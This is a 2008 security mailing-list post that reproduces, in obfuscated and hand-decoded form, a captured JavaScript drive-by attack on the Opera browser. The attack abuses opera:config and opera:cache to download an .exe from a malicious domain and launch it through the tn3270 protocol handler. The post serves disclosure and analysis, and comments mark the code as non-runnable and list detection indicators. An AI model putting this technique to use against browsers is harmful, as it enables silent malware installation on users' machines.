
Re: Opera Stored Cross Site Scripting


From: Kanedaaa Bohater <kaneda () bohater net>
Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST)


Just found a way to use Stefano's opera:config idea to execute code remotely.

Hi.

3 months ago I found on a malware site
(www.google.com.update.login.jsp.podavanda.cn) that when your User-Agent
was Opera, it served you code similar to yours, but it first
downloaded a malware .exe file into opera:cache (Opera pre-downloads
files) and later pointed the tn3270:// protocol handler at that file (but without
opera:historysearch). It was probably for an older Opera version...


<script>
// Captured sample as posted (2008), reproduced as-is. Every string is built by
// .replace()-stripping filler characters from a padded token, so the plain
// words (iframe, about:blank, opera:config, opera:cache, the download URL, the
// "Network" / "TN3270 App" preference) never appear literally; the author's
// hand-decoded rendering of the same code follows further down. The " () "
// inside the URL token is the archive's anti-spam munging of "@".
blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, ''));
blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, '');
blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), "dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, ''));
blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), "bLlPaPn@kL_Bi@f@rLaBm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, 
''));
document.appendChild(blank_iframe);
// Second stage is a backslash-continued string handed to eval on the hidden
// iframe's window; its nested unescaped double quotes are the author's
// transcription, not valid JavaScript as shown.
blank_iframe_window.eval
        ("config_iframe = document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\
        config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), 
"cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, ''));\
        cache_iframe = document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\
        app_iframe.src = "hUtUtUpY:y/y/UwUwYwU.@gYoyo@gYlye ()  UcyoXmY Xu@pXdYaytYeU.UlYoygXiyny.Uj@s@pX.@pXoXd () 
ayvYaynydXaY yc@ny/XI@I@lU/yxXlXoUaydUe@r@.ye@xyeX".replace(/[UXYy@]/g, '');\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, '');\
                cache_iframe.onload = function ()\
                {\
                        cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A 
HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 
4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes 
sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, ''), 
"tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\
                        app_link.click();\
                        setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, 
''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, ''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>


which was something like:

<script>
// The author's hand-decoded rendering of the obfuscated sample above; the
// download URL is defanged as "hxxp://". It carries transcription slips (the
// stray ")" in the setAttribute("id") call, the unescaped quotes inside the
// eval string), so read it as an illustration of the technique rather than a
// runnable artifact. Items worth matching on in page content or logs are all
// visible here: hidden iframe loads of opera:config and opera:cache from web
// content, and a write to the "Network" / "TN3270 App" preference.
blank_iframe = document.createElement("iframe");
blank_iframe.src = "about:blank";
blank_iframe.setAttribute("style", "display:none");
blank_iframe.setAttribute("id"), "blank_iframe_window");
document.appendChild(blank_iframe);
// Second stage: a backslash-continued string evaluated in the hidden iframe's
// window (see the preceding note on its quoting).
blank_iframe_window.eval
        ("config_iframe = document.createElement("iframe");\
        config_iframe.setAttribute("id", "config_iframe_window");\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement("script");\
        cache_iframe = document.createElement("iframe");\
        app_iframe.src = "hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = "opera:cache";\
                cache_iframe.onload = function ()\
                {\
                        cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A 
HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        opera.setPreference("Network","TN3270 App",opera.getPreference("User Prefs","Cache 
Directory4")+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute("href", "tn3270://nothing");\
                        app_link.click();\
                        setTimeout(function(){opera.setPreference("Network","TN3270 App","telnet.exe~")},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>

but unfortunately I don't have much time for testing...

-- 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member...     kaneda () bohater net


